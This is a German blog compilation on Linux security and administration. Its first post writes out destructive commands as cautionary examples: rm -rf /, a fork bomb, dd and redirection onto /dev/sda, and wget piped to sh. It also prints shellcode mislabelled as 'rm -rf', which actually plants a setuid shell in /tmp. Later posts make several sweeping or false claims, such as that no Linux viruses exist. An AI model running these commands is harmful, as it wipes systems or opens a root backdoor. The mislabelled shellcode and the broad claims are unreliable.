GefĂ€hrliche Befehle, Linux-Bom­ben


Inhaltsverzeichnis

Vorwort
1. rm
2. rm -rf in hexadezimal
3. Forkbomb
4. Copy und Paste
5. Device Null
6. Operatoren
7. WGET
8. dd
9. Weitere Befehle
Fazit
Quellen


Vorwort

Vorsicht, nur in virtuellen Maschinen testen! Als Testsystem hatte ich ein Ubuntu 16.04 in eine virtuelle Maschine installiert und mehrfach kopiert.


1. rm

Die bekannteste Linux-Bombe ist wohl „rm“, denn es wird oft vergessen den kompletten Pfad anzugeben, auch wenn man in einem Unterverzeichnis ist, denn dieser Befehl geht ĂŒber die Wurzel. Und es ist auch hoch bezahlten Admins schon passiert.

sudo rm -rf /

Dieser Befehl löscht ohne Nachfrage rekursiv alles ab Wurzelverzeichnis. Alles heißt, alle eingehĂ€ngte Laufwerke und auch alle Netzlaufwerke.
Funktioniert todsicher! Aber nicht unter dem Ubuntu, dort wird eine Warnung ausgegeben.
Gegenmaßnahme
Ein Fallstrick kann „safe-rm“ sein. Es soll vor unbeabsichtigten löschen helfen. Wer sich aber daran gewöhnt und auf einen anderen/neuen Rechner kein „safe-rm“ installiert hat, dann ist „rm“ ist seiner Gewalt nicht zu bremsen.
Ansonsten hilft auch kein beten.
Quelle
Weiteres in jedem Linux-Handbuch und jeder Unix-Befehlsreferenz.


2. rm -rf in hexadezimal

Ist genauso schÀdlich:

char esp[] __attribute__ ((section(".text"))) /* e.s.p
release */
= "\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68"
"\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99"
"\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7"
"\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56"
"\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31"
"\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69"
"\x6e\x2f\x73\x68\x00\x2d\x63\x00"
"cp -p /bin/sh /tmp/.beyond; chmod 4755
/tmp/.beyond;";

Unter Ubuntu mĂŒssten dazu die Pakete release und bikeshed installiert sein. Hat bei mir unter Ubuntu nicht funktioniert.


3. Forkbomb

Rechner auslasten mit HintergrundaktivitĂ€t und damit die CPU mal richtig heiß wird und sich selbst auslötet.

:(){ :|:& };:

Funktion die definiert wird, hier „:()“, ruft sich selbst als HintergrundaktivitĂ€t auf und ĂŒbergibt sich wieder neu und so weiter, also eine typische Forkbomb. Funktioniert unter Ubuntu. Bösartig, es wird am Anfang nicht gleich wahrgenommen und Systemmonitore, wie „Conky“, zeigen durch die 100% ausgelastete CPU keine VerĂ€nderungen an.
Gegenmaßnahme
Schutz gibt es, wenn die Datei „/etc/security/limits.conf“ dem entsprechend editiert wird.


4. Copy und Paste

Das Internet hilft bei vielen Gelegenheiten, aber ersetzt nicht das eigene Denken. Kopieren und EinfĂŒgen kann gefĂ€hrlich sein. Hinter einer harmlosen Eingabe wie

echo "Hallo Welt!"

kann man auch

rm -rf /

verstecken.
Gegenmaßnahme
Vorsichtshalber in ein Editor einfĂŒgen, hilft aber auch nicht immer :-)


5. Device Null

Das GerÀt Null ist tatsÀchlich entstanden um Daten, die als unwichtig gelten, in das Nichts zu senden.
Doch folgende Befehlszeile löscht das gesamte /home-Verzeichnis des angemeldetem Benutzers.

mv ~ /dev/null

In Ubuntu ist dafĂŒr keine Berechtigung vorhanden.
Gegenmaßnahme
Nachdenken, was soll eine Tilde, also das /home-Verzeichnis, mit Null zu tun haben!


6. Operatoren

Gerne nutze ich das Kommando „ls > Verzeichnis.txt“ um mir den Inhalt eines Verzeichnis als Textdatei abzulegen. Und bei Änderungen lege ich mit dem doppelten Operanden „ls >> Verzeichnis.txt“ in der selben Datei am Ende nach.

ls > /dev/sda

Wird aber dieser Befehl ausgefĂŒhrt ĂŒberschreibt er die genannte Festplatte mit sich selbst. Statt „ls“ könnte auch ein anderer Befehl genommen werden, die Auswirkung ist gleich, da hier der Operand den Fehler ausĂŒbt. In Ubuntu ist dafĂŒr keine Berechtigung vorhanden.
Gegenmaßnahme
Immer erst in einer virtuellen Maschine solche Kommandos prĂŒfen.


7. WGET

Ist dieselbe Bequemlichkeit wie kopieren und einfĂŒgen. Ein Script wird im Netz zur VerfĂŒgung gestellt und nun kann man es einfach durch die Shell ausfĂŒhren, mit Verhinderung von wichtigen Informationen.

wget http://webseite.com -q | sh

Nur, ob die Beschreibung des Skriptes mit dem tatsĂ€chlichem Inhalt ĂŒbereinstimmt, ist hier nicht plausibel erwiesen.
Hat in meiner Ubuntu-Installation nicht funktioniert.
Gegenmaßnahme
Durch „quiet“ ist es noch nicht mal möglich die Gefahr zu bannen, zum Beispiel mit „Strg+c“.


8. dd

Dieses Kommando ist zum Kopieren gedacht. Hier ist Missbrauch möglich, um DatentrĂ€ger zu ĂŒberschreiben.

dd if=/dev/urandom of=/dev/sda

An diesem Beispiel werden Zufallszahlen auf die gesamte Festplatte geschrieben und somit der vorhandene Inhalt gelöscht.
Gegenmaßnahme
Da hab ich es mit Nelson -> „Haha“.


9. Weitere Befehle die vorsichtig angewendet werden sollten.

Die nachfolgenden Kommandos habe ich nicht getestet, erscheinen aber logisch.

sudo chmod 000 -R /

Rechte werden rekursiv entzogen oder keine erteilt wie manÂŽs sieht. Daten bleiben aber erhalten.
Mit umask wÀren sicherlich auch solche Spielchen möglich.

touch root
sudo chattr +i root

Datei mit +i unverÀnderlich setzen

sudo chattr -i root

Attribut wieder entfernen


10. Fazit

Das sind wohl einige der bekanntesten Fallgruben. Trotzdem sollte bei angebotener Hilfe das eigene Denken die erste HĂŒrde sein und ein gesundes Maß an Misstrauen, ob andere nicht auch FlĂŒchtigkeitsfehler machen, wĂ€re angebracht.


Quellen

Linux-Handbuch von Kofler, Gallileo-Verlag
Unix-Befehlsreferenzen im Netz
http://www.junauza.com/2008/11/7-deadly-linux-commands.html
https://ppfeufer.de/lokale-linuxssicherheit-oder-wie-entschaerf-ich-die-bombe.html/
https://www.schnatterente.net/software/versteckter-schadcode-gefaehrliche-linux-howtos/2
https://www.heise.de/security/dienste/Copy-Paste-Tricks-1842691.html
https://de.wikipedia.org/wiki//dev/null
https://de.godaddy.com/blog/die-5-gefaehrlichsten-kommandos-in-der-linux-konsole/
https://wiki.ubuntuusers.de/wget/
http://www.linux-community.de/Internal/Nachrichten/Die-7-toedlichsten-Linux-Kommandos

Ransom und Backup


Inhaltsverzeichnis

Auf die erpresserische Forderung eingehen
Können verschlĂŒsselte Daten wieder entschlĂŒsselt werden
Schutzmaßnahmen
Kein Backup? Kein Mitleid!
Der wirkliche Grund, weshalb das Backup vernachlÀssigt wird
Gibt es eine einfache und schnelle und billige Backup-Lösung
Wo entstehen die Kosten
Fazit


Aus meiner Sicht gibt es mehrere Schutzmaßnahmen gegenĂŒber VerschlĂŒsselungssoftware von Erpressern. Doch nur in ihrer Summe sind diese Maßnahmen erfolgreich.


Auf die erpresserische Forderung eingehen

macht keinen Sinn. Warum sollen die Erpresser das Risiko eingehen, bei welch auch immer gearteten Übergabe des SchlĂŒssels, enttarnt zu werden? Außerdem wollen diese ja nur Geld und keine weitere Arbeit, denn irgendwelche Referenzen können zu den Erpressern nicht abgefragt werden, Stichwort Enttarnung.


Können verschlĂŒsselte Daten wieder entschlĂŒsselt werden

Ja. Doch die wenigsten Menschen, Firmen und Institutionen haben soviel Zeit, soviel Geld und soviel RechenkapazitÀt um das ernsthaft zu erwÀgen.


Schutzmaßnahmen

In der PrioritÀt aufgelistet sind das
1. ein intelligentes Betriebssystem
2. ein Bewusstsein fĂŒr die Sicherheit der eigenen Daten
3. freie quelloffene Software
4. stÀndige Aktualisierung des Betriebssystems und jeglicher Software
5. Backup
Nur zusammen ergeben diese Maßnahmen ein Abwehrpaket gegenĂŒber den Erpressern. Über die ersten vier Punkte habe ich schon des öfteren BeitrĂ€ge geschrieben und auch ĂŒber das Backup.
Entscheidungshilfe beim ersten Punkt, alle intelligenten Betriebssysteme haben einen Frontslash oder auch Forward Slash „/“ zum trennen von Verzeichnissen.


Kein Backup? Kein Mitleid!

Die meisten haben die Einsicht das Backup wichtig ist, doch nur ein Bruchteil besitzt ein Backup das jĂŒnger ist als 2 Wochen.
Backup ist zu aller erst sehr unbequem
– wie erstelle ich ein richtiges Backup
– welche Daten mĂŒssen gesichert werden und welche nicht
– welche Software ist die richtige
– wie lange dauert so ein Backup
– wie oft soll ein Backup erstellt werden
– wohin wird ein Backup erstellt
– wie funktioniert ein Restore des Backup
– mĂŒssen noch andere Sachen beachtet werden
– wie werden Fehler beim Backup vermieden
– geht das auch automatisch mit dem Backup
– welche Schnittstellen fĂŒr Hard- und Software sind zugĂ€nglich
– und weitere Fragen sind zu beantworten

Gut alle diese Fragen können nur mit einem geschriebenen Buch beantwortet werden.

Bei Verantwortung außerhalb der eigenen Person gibt es noch zwei weitere Unbequemlichkeiten, echte Kosten, auch wenn die Software kostenlos ist, und Zeitmangel.


Der wirkliche Grund, weshalb das Backup vernachlÀssigt wird

Weshalb sollte man 19.999 Mal Daten sichern wenn diese nur in jedem 20.000 Fall benötigt werden?
Als privater Mensch trauert man Bilder, Videos und Musik hinterher. Doch bei Verantwortung außerhalb der eigenen Person geht es ans Eingemachte. Folgende Fragen bleiben unbeantwortet „Welche Lieferung wurde durchgefĂŒhrt?“, „Welche Rechnung ist offen?“ und zudem ist viel Korrespondenz verloren.


Gibt es eine einfache und schnelle und billige Backup-Lösung

Nein, definitiv!


Wo entstehen die Kosten

Es gibt zwei Kostenfaktoren
a) die benötigte Hardware
b) die professionelle und individuelle Konfiguration

Zu a)
Egal welche Hardware genutzt wird, dazu zÀhlt auch die Cloud, es kostet Geld.
Jetzt kommen die Oberschlauen und meinen ihre Cloud wĂ€re kostenlos und hĂ€tte genug Speicherplatz. Aber ich habe keine Lust solch einen Irrtum aufzuklĂ€ren, da hier schon elementar die Sicherheit der eigen Daten als völlig unwichtig gesehen wird, trotz eigener VerschlĂŒsselung. Nur soviel, die IP-Adressen die dieses Backup besuchen muss, und dort dupliziert werden kann, um endlich in „ihrer“ Cloud zu landen, fĂŒllen möglicherweise eine Din A4-Seite.

Zu b)
Wer noch nie viel Zeit hatte, sich mit Sicherheit und Backup von Daten auseinander zusetzen, wird die richtige und schnelle Backup-Lösung trotz professioneller Software nicht finden. Erst die individuelle Lösung, ist auch das schnellste Backup und spart sehr viel Zeit und möglicherweise Hardware.


Fazit

Der wichtigste Faktor bei VerschlĂŒsselung und Backup ist die Zeit und nicht das Geld, aber steht kein Geld zur VerfĂŒgung nutzt auch viel Zeit nichts.

Qemu

Aus SicherheitsgrĂŒnden und um einen Komfort zu geniessen, besitze ich mehrere virtualisierte Betriebssysteme. FrĂŒher nahm ich dazu die „VirtualBox“ von „Oracel“. Doch da die Firmenpolitik von „Oracel“ mir nicht gefĂ€llt, habe ich mich seit lĂ€ngerem „qemu“ zu gewandt. Hier nun einige Erkenntnissen von mir.


Inhaltsverzeichnis

GrundsÀtzliches
Tastenkombinationen
qemu-monitor
Starten ĂŒber Icon
Links
Bilder


GrundsÀtzliches

  • qemu-Virtualisierungen laufen, wie auch die Betriebssysteme von „VirtualBox“, in einem eigenem Fenster.
  • Über den qemu-Monitor, einer Spezialkonsole, sind zusĂ€tzliche Steuerungen wĂ€hrend des laufenden Betriebes möglich.
  • Installationen und Laufwerke können ohne grafische OberflĂ€che erstellt werden.
  • Die Laufwerke können direkt mit einem Link, oder „Starter“, gebootet werden.
  • Es stehen aber auch einige GUIs zur VerfĂŒgung. Ich empfehle den „virt-manager“.
  • Tastenkombination lassen schnelles Arbeiten zu.

Tastenkombinationen

Virtualisierungsfenster
Strg + Alt + f Umschalten zwischen Fenster- auf Vollbildmodus
Strg + Alt + u Fenster nach GrĂ¶ĂŸenĂ€nderung wiederherstellen
Strg + Alt Maus aus dem Virtualisierungsfenster holen
qemu-monitor
Strg + Alt + 2 Wechsel vom Virtualisierungsfenster in den qemu-monitor
Strg + Alt + 1 Wechsel vom qemu-monitor in das Virtualisierungsfenster

qemu-monitor

Beispiele von Eingaben

sendkey ctrl-alt-f1 auf die erste Konsole im Virtualisierungsfenster schalten
sendkey ctrl-alt-f2 auf die zweite Konsole im Virtualisierungsfenster schalten
sendkey ctrl-alt-f7 zurĂŒck auf die GUI im Virtualisierungsfenster schalten
screendump bild.ppm Erstellt ein Bildschirmfoto vom Virtualisierungsfenster im Verzeichnis wo das virtuelle Laufwerk liegt.
system_reset Erste Hilfe, wenn ein System hÀngt.
system_powerdown Ernste Hilfe, wenn ein System hÀngt.
q Letzte Hilfe, wenn ein System hÀngt. Auch quit.

Starten ĂŒber Icon

Einfach ein Laufwerk, zum Beispiel auf den Schreibtisch, mit einer VerknĂŒpfung, bei Ubuntu heißt das „Starter“, booten.


Den Starter könnte man so einrichten:
Beschreibung: Windows 10 starten
Befehl: qemu-system-x86_64 -enable-kvm -M q35 /home/mein-name/virtuelle-laufwerke/Windows10-64bit.vdi -cpu Opteron_G5 -smp 2 -m 2G -k de -vga qxl -display sdl,window_close=off
Arbeitsverzeichnis:/home/mein-name/virtuelle-laufwerke


Der Befehl im Einzelnem

qemu-system-x86_64

das Grundsystem der Virtualisierung, der Emulator

-enable-kvm

diese Option verbindet den Emulator mit dem Wirtssystem

-M q35

diese Option holt den modernen virtuellen Chipsatz „Q35“

/home/mein-name/virtuelle-laufwerke/Windows10-64bit.vdi

dieser Pfad holt beispielsweise ein von der VirtualBox geschaffenes Laufwerk in qemu

-cpu Opteron_G5

dies Option bestimmt die gewĂŒnschte CPU

-smp 2

Anzahl der CPU-Kerne, beachte das Wirtssystem

-m 2G

diese Option bestimmt 2 GB RAM fĂŒr die Virtualisierung, beachte das Wirtssystem

-k de

hiermit wird die deutsche Tastatur geladen

-vga qxl

QXL ist der Grafiktreiber

-display sdl,window_close=off
display sdl 

steht fĂŒr seperates grafisches Fenster und

,window_close=off

bedeutet, das Fenster kann nicht geschlossen werden, also gegen unbeabsichtigtes abschießen der Virtualisierung

Links

Hier sind weiterfĂŒhrende Links zum Thema. Aber Vorsicht, manche Einstellungen sind nicht fĂŒr x86 oder x64 CPUs und im gĂŒnstigstem Falle einfach nur wirkungslos.
https://wiki.ubuntuusers.de/QEMU/
https://wiki.ubuntuusers.de/KVM/
https://wiki.archlinux.org/index.php/QEMU
https://wiki.archlinux.de/title/QEMU#QEMU-Monitor
https://en.wikibooks.org/wiki/QEMU/Monitor
http://download.qemu-project.org/qemu-doc.html


Bilder

„Grsync“ inkrementelles Backup mit Ausschluss von Verzeichnissen

Der Sinn von Backups ist in diesem Beitrag nicht Gegenstand.

Inhaltsverzeichnis

  1. Inkrementelles Backup
  2. Vorbereitungen
  3. Der Befehle rsync mit der grafischen Aufsatz „Grsync“.
  4. Ausschluss von Dateien und Verzeichnissen
  5. Verweise

Inkrementelles Backup
In dieser Art werden nur geÀnderte Dateien und Verzeichnisse mit einem schon vorhandenem Backup synchronisiert. Nur beim erstmaligen Benutzung der inkrementellen Synchronisation, wird ein komplettes Backup erstellt.
Die Vorteile dieser Art von Backup liegt darin:

  • es dauert nur wenige Sekunden auf SSD-Festplatten
  • es dauert nur wenige Minuten auf HDD-Festplatten
  • es kann tĂ€glich ohne Mehraufwand durchgefĂŒhrt werden, auf dem 1. Backup-Medium
  • es kann wöchentlich ohne Mehraufwand durchgefĂŒhrt werden, auf dem 2. Backup-Medium

Vorbereitungen
Damit nur relevante Daten gesichert werden sind muss eine Bereinigung von unnötigen Daten durchgefĂŒhrt werden. Wenn Sie es nicht wissen wie, nehmen Sie bleachbit zu Hilfe. Nur wenn Sie wirklich wissen was Sie tun, sollten einmal im Monat die verwaisten Pakete und doppelte Dateien entfernt werden.


Der Befehle rsync mit der grafischen Aufsatz „Grsync“.
Grsync-01


Ausschluss von Dateien und Verzeichnissen
Der Ausschluss erfolgt so, das der Pfad im jeweiligen Verzeichnis beginnt.

Beispiel mit Grsync unter „Erweiterte Optionen“

--exclude=/.config/geheimes-verzeichnis

Beispiel mit rsync im Terminal

rsync -r -t -v --progress --delete --size-only -s --exclude=/.config/geheimes-verzeichnis //home/ /media/home/

Vorsicht, oft wird der gesamte Pfad eingetragen, das ist dann Wirkungslos.
Falsches Beispiel

--exclude=/home/user/.config/geheimes-verzeichnis

Verweise
Datensicherung – Backup
Superschnell ISO-Datei erstellen von CD oder DVD mit Befehl „dd“
Windows-Umzug von HDD auf SSD
Windows zu Linux – der Umstieg

Unterschiede zwischen Linux und Windows

Das ist ein Versuch beide Betriebssysteme zu vergleichen.

Inhaltsverzeichnis

  1. Software
  2. Hardware
  3. Viren
  4. Sicherheit
  5. Updates und Aktualisierungen
  6. Verbreitung und KompatibilitÀt
  7. Benutzerfreundlichkeit
  8. Verweise

Linux Windows
Software
Software wird ausschließlich ĂŒber ein Portal der Distribution installiert, das gewĂ€hrleistet die Echtheit und die Sicherheit des jeweiligen Programms.
Zugang zu diesem Portal besteht ĂŒber

  • Software-Center oder
  • Synaptic oder
  • Terminal installiert.

Falls Software aus dem Internetbrowser installiert wird, ist das System komprimiert, also unsicher und die StabilitÀt ist aufgehoben.

Software wird aus

  • verschiedenen Quellen und
  • nicht geprĂŒft Quellen installiert.

Außerdem werden

  •  ungefragt Zusatz-Software installiert,
  • Browser-Fenster mit Werbung geöffnet,
  • die Kontrolle durch „Einfache Installation“ entzogen und
  • meist die Programme ungefragt in den Autostart verlinkt, womit der PC sofort langsamer wird fĂŒr die gesamte Lebenszeit.
Die Standartsoftware der Distribution ist kostenlos und zwischen allen meist genutzten Betriebssystemen lesbar. Windows ist kostenpflichtig, außer das abgelaufene Angebot des Update von Windows 7 bis Windows 8.1 auf Windows 10. Viele angebotenen Programme sind kostenpflichtig und damit nicht interoperabel.
FĂŒr jede Software ist Voraussetzung eine ausfĂŒhrlicher Hilfetext. Meist ist auch ein Handbuch dabei. Softwarehilfe ist keine Voraussetzung fĂŒr Windows-Software.
Hardware
GerÀte werden meist von Linux sofort erkannt und installiert. GerÀte werden zum Teil erkannt. Manchmal werden bei Àlteren GerÀten Standarttreiber installiert.
Ausnahmen sind billig hergestellte MehrfunktionsgerĂ€te und manchmal WLAN-GerĂ€te, da diese dem Sicherheitskonzept von Linux zu wider laufen. Oft mĂŒssen Treiber-CD-ROMS eingelegt werden, die ungefragt andere Software zu den Treibern mit installiert. Zudem ist die zusĂ€tzliche Software redundant, da meist schon funktionell dieselben Programme vorhanden sind und genutzt wird.
Eine Festplatte mit Linux lÀuft sofort auf einen anderen Rechner ohne Neuinstallation. Eine Festplatte mit Windows lÀuft nur innerhalb eines und desselben Computers.
Viren
Viren fĂŒr Linux in freier Wildbahn existieren nicht.
Trotzdem kann ein Antiviren-Programm, wie „Clam-TK“ installiert werden, um beispielsweise Software und E-Mails von Windows-Rechnern zu prĂŒfen, damit diese auf anderen Windows-Rechnern keinen Schaden mehr anrichten können.
Anti-Viren-Software ist zwingend notwendig.
Die Nebenwirkung ist, das die Systemressourcen zur HĂ€lfte schon ausgenutzt sind und dem tĂ€glichen Arbeiten nicht mehr zur VerfĂŒgung steht.
Sicherheit
Offene Programmquellen, mit der Möglichkeit der ÜberprĂŒfung. Geschlossener, unbekannter und mit vielen nicht gepatchten Sicher­heitslĂŒcken behafteter Programmcode.
Administrator-Rechte, unter Linux root-Rechte, nur begrenzt auf Zeit und meist nur fĂŒr eine Funktion. Zum komfortablen Arbeiten ist meist der Benutzer immer mit Administrator-Rechten ausgestattet, was Viren und anderer Schadsoftware alle TĂŒren öffnet.
Software aus einer sicheren und geprĂŒften Quellen der eigenen Distribution. Software wird aus verschiedenen Quellen und nicht geprĂŒft Quellen installiert, da unter Windows 10 der „Windows Store“ sehr sehr mager ist.
Kein Antivirenprogramm zwingend notwendig. Anti-Viren-Software ist zwingend notwendig.
Updates und Aktualisierungen
Es existiert ein Update-Service fĂŒr die gesamte installierte Software. Es sind verschiedene Updater installiert.

  • Windows-Updater
  • Microsoft-Updater
  • Updater fĂŒr Adobe-Produkte,
  • Updater fĂŒr die Java-Umgebung
  • und viele weitere.

Diese Updater sind entweder omnipresent im Autostart oder als Dienst.

Sicherheitsupdates kommen sofort nachdem diese erstellt sind. Also wenn notwendig mehrmals tĂ€glich. Sicherheitsupdates kommen erst nach vorgegebenen Zeiten im Monat oder im Jahr, solange bleiben die SicherheitslĂŒcken bekannt und offen fĂŒr Angriffe.
Ein Neustart ist bei 99,99% nicht notwendig, also extrem selten. Nach meiner Erfahrung etwa 3x im Jahr.
Der Neustart ist nur um wenige Sekunden verzögert.
Ein Neustart ist immer notwendig.
Ein Neustart kann bis Stunden dauern.
Software-Updates werden bei den meisten Distributionen sofort angeboten, sofort nutzbar und ein Neustart ist nicht notwendig. Ob neue Versionen vorhanden sind, muss selber vom Benutzer erkundet werden, außer bei den jeweiligen Updatern von verschieden Programmen.
Ein Neustart ist meist notwendig.
Verbreitung und KompatibilitÀt
Linux, Unix, BSD, alle Apple-Betriebssysteme, Android und die meisten anderen Betriebssysteme sind vom Betriebskern aus einer Quelle entstanden.
Erkennbar ist das fĂŒr jeden, durch den Frontslash bei Pfadangaben.
Windows ist ein Betriebssystem, das selbst innerhalb seiner eigene Versionen nicht kompatibel ist.
Siehe „MS Office 2007“, das ist nicht lauffĂ€hig unter Windows 10.
Linux ist das meist genutzte Betriebssystem!
Beispielsweise genutzt in:

  • embedded Betriebssysteme
  • Routern und andere Netzwerk-Hardware
  • Fernseher, Radio, HaushaltsgerĂ€te
  • industriellen Arbeitsmittel
  • Internet-Server
  • Datenbank-Systemen
„Windows“ ist das meist genutzte Desktop-Betriebssystem.
Windows ist die meist genutzte Schnittstelle bei den Sparkassen-Terminals fĂŒr Kontoinhaber und oft genutzt bei Ă€lteren industriellen Arbeitsmitteln.
Benutzerfreundlichkeit
Benutzerkonzepte sind langfristig angelegt und Àndern sich meist nur durch anerkannte und pragmatische Verbesserung.
Die Entwickler sind in Kommunikation mit den Benutzern.
Benutzerkonzepte Àndern sich sprunghaft, sind auch mit Nachteilen behaftet und ohne erkennbare Vorteile.
Eine anerkannte Kommunikation mit den Benutzern existiert nicht.
Verschiedene Desktop-Systeme, wie „Gnome“, „KDE“, „XFCE“, „Mate“, „Cinnamon“ und weitere, bieten ein angepasstes Nutzerverhalten. Ein einziger Desktop und der ist nur schwerfĂ€llig anpassbar.
Bei lĂ€ngeren Prozessen werden zu der Progressionsbar, noch die Möglichkeit gegeben, sich Details anzeigen zu lassen, also die tatsĂ€chlich laufenden Operationen. Außer beim Kopiervorgang sind alle Progressionsbar unter Windows ein Mysterium. Fragen wie, was passiert gerade oder geht ĂŒberhaupt noch was, bleiben somit unbeantwortet.

Verweise
Windows 10 – Vorteil und Nachteile
Windows und Linux, der wirklich wahre Unterschied
Windows 8 oder Linux hat Fenster und keine U-Bahn!

Orientierungshilfen fĂŒr Sicherheit

Dieser Beitrag wird immer erweitert.


Desktop
Microsofts Windows 10 Botnet
Vor Windows 8 wird gewarnt
Der Staatstrojaner


Bildbearbeitung und Scanner
Scanner die den Inhalt neu interpretieren.
Iris-Hack einfach gemacht.


E-Mail
Deutsche Industrie sorgt sich stiefmĂŒtterlich um den Kunden.

Problem:
Ihr Linux hat keine vorinstallierte Aktualisierungssoftware? Und Sie wollen auch Ihre Distribution auf dem laufendem halten? Oder die nachtrÀglich zu installierende Software will bis zu mehrere hundert Megabyte installieren?

.

Problem:
Ihr Linux hat keine vorinstallierte Aktualisierungssoftware? Und Sie wollen auch Ihre Distribution auf dem laufendem halten? Oder die nachtrÀglich zu installierende Software will bis zu mehrere hundert Megabyte installieren?

.

Problem:
Ihr Linux hat keine vorinstallierte Aktualisierungssoftware? Und Sie wollen auch Ihre Distribution auf dem laufendem halten? Oder die nachtrÀglich zu installierende Software will bis zu mehrere hundert Megabyte installieren?

.

Problem:
Ihr Linux hat keine vorinstallierte Aktualisierungssoftware? Und Sie wollen auch Ihre Distribution auf dem laufendem halten? Oder die nachtrÀglich zu installierende Software will bis zu mehrere hundert Megabyte installieren?

.

Problem:
Ihr Linux hat keine vorinstallierte Aktualisierungssoftware? Und Sie wollen auch Ihre Distribution auf dem laufendem halten? Oder die nachtrÀglich zu installierende Software will bis zu mehrere hundert Megabyte installieren?

Pishing-Mail

Problem
Sie haben eine echt aussehende E-Mail eines von Ihnen genutzten Dienstes erhalten mit besorgniserregendem Inhalt.

Lösung
Das Erkennen solcher gefÀlschten [Fake] E-Mails zeige ich Ihnen in 4 Punkten.

1. Wichtige Post von großen Dienstleistern, wie „Amazon“, „Ebay“, „Deutsche Bank“, „Paybal“ und „Weltbank“ erhalten Sie immer noch in Papierform, nicht per E-Mail.
2. Die Herkunft-E-Mail-Adresse und Antwort-E-Mail-Adresse prĂŒfen.
3. Adresse des in der Nachricht verlinkten Textes prĂŒfen.
4. Bei Verdacht kann auch der Quelltext der E-Mail eine KlÀrung bringen.


zu 1.
Pishing kommt so selten als Papier-Briefpost, weil es echtes Geld kostet gegenĂŒber einer E-Mail!

zu 2.
Eine Pishing-Mail, angeblich von „Amazon“, mit der Top-Domain „.top“ mag ja witzig sein, aber dennoch ist diese nicht leicht erkennbar als Fake, da es eine sehr neue und meist unbekannte Endung ist, wie eben in „service@amazon.abteilung91260294.top“. Aber „Amazon“ hat sehr viele Domains und kann auch entsprechende lĂ€nderspezifische Subdomains ohne Ende erstellen, so das sie nicht auf eine „.top“-Domain angewiesen sind.

Eine weitere Pishing-Mail erreichte mich heute von der „Weltbank“, deren Besonderheiten sind:

  • schlechtes Deutsch
  • E-Mail-Adresse des Absender ist verschieden zur Antwort-E-Mail-Adresse
  • ein Abteilungs-Direktor der Weltbank, schreibt offiziell mit einer Gmail-Adresse
  • die als GeschĂ€ftsbrief dargestellte E-Mail hat die Konventionen eine GeschĂ€ftsbriefes nicht eingehalten

zu 3.

Bevor der Link mit der Aufforderung zur Eingabe im Webbrowser angeklickt wird, kann auch der Link in der Statusleiste des E-Mail-Programms gelesen werden, wenn mit der Maus ohne Klick darĂŒber gestrichen wird.

zu 4.
Alle Daten einer E-Mail sehen Sie im Quelltext der E-Mail und die sind sehr aufschlussreich!

Detailliert in Bildern die Pishing-Mail von „Amazon“
Hier die gesamte Mail. Wo schon „Thunderbird“ aufmerksam reagierte.
Pishing-Amazon-Mail


Zuerst fĂ€llt die vertrauenswĂŒrdige Adresse „abteilung91260294.top“ auf.
Pishing-Amazon-Adresse


Und auch die interessante Adresse des Links „http://amazon.fci918.flu.cc/53/g4/uj/“ ist eine Augenweide. Denn die Kokosinsel haben im Januar 2016 vermutlich nicht mal 500 Einwohner.
Pishing-Amazon-Quelle


Detailliert in Bildern die Pishing-Mail der „Weltbank“
Das ist der Pishing-Text im bestem Neudeutsch, nachdem ich meine 2 Millionen Dollar bekommen soll, wenn ich alle meine Daten ĂŒbermittle.
Pishing-Text


Absender-Adresse: „koba@online.ge“ mit der Top-Domain von Georgien
Antwort-Adresse: „drechoblum1732@gmail.com“ Google-Mail-Adresse von einem Direktor der Weltbank
Pishing-Adressen


Im Quelltext ist erkenntlich wo der Absender tatsĂ€chlich diese Mail geschrieben hat. Nicht in den USA, wie der Inhalt glaubhaft machen will, und nicht in Georgien wie die Adresse mit der Top-Domain „.ge“ vermuten lassen könnte. Denn charset=“iso-8859-1″ ist der Zeichensatz „Latin-1, WesteuropĂ€isch“.
Pishing-Quelltext


Hier die vollstÀndige E-Mail, damit auch die kindliche Formatierung ersichtlich wird mit der vierfach Formatierung von Zeichen und der fehlenden Absatzkontrolle.
Pishing-Weltbank-16

seriöse Webseite

Was eine seriöse Webseite ist, kann ich nur von meinen Standpunkt erklÀren und mit meiner Erfahrung seit 1996.

Hier eine Priorisierung

Technik der Webseite
1. zu aller erst soll die Webseite sich schnell öffnen
2. nur verbreitete und OpenSource-Technologien verwenden
3. aktuelle Versionen nutzen, wie HTML5, CSS3, PHP ab 5.4, MySQL ab 5.x
4. responsives Verhalten der Webseite
5. ein modernes CMS fĂŒr Erweiterbarkeit und Bedienbarkeit
6. Bildformate in der Reihenfolge PNG, JPG und GIF
7. Videoformate in der Reihenfolge OGV, WebM und MP4
8. Hohe Sicherheit fĂŒr die Besucher mit weitestgehendem Verzicht auf Javascript

Erste Seite der Webseite, auch Frontpage, Homepage oder Mainpage
1. soll sie sofort zum Thema kommen
2. Zielgruppe direkt ansprechen
3. kein großes Bild, siehe 1. bei Technik der Webseite
4. die Webseite muss auf einem Smartphone lesbar sein
5. Navigation muss sichtbar sein
6. Impressum muss erreichbar sein
7. keine Fremdwerbung

Inhalt der Webseite
1. eigene Bilder, gerne auch groß
2. Farben des Logos und dem Inhalt der Webseite angepasst
3. aktuelle Inhalte mit mindestens ein Beitrag jeden Monat
4. Fakten
5. Navigation des Verstehens, also auch Kategorien und Schlagwörter
6. AufzÀhlungen oder Tabellen statt SchachtelsÀtze
7. Downloads fĂŒr Dokumente nur in PDF-Format anbieten

Was nicht auf eine seriöse Webseite gehört
1. Flash
2. Klammern
3. AbkĂŒrzungen
4. Bindestriche, wenn nicht vorgegeben
5. mehrfachen Superlative
6. FĂŒllwörter
7. Werbephrasen

Linux – ganz einfach sicher

Bei Linux ist es relativ einfach die Sicherheit selbst zu erhöhen.

  1. LTS, Nutzen Sie LTS-Versionen ihrer Distribution und ihrer Desktop-Umgebung, LTS = Long Term Support = Langzeit-UnterstĂŒtzung
  2. Repositorie, das sicherste ist das des eigenen Distributor
  3. Sicherheitsupdates, immer automatisch installieren lassen
  4. AufrÀumen, mit bleachbit und synaptic
  5. Backup, ganz banal und wöchentlich und schnell mit ikrementell
  6. extremer Schutz, home-Verzeichnis verschlĂŒsseln, schon bei Distro-Setup
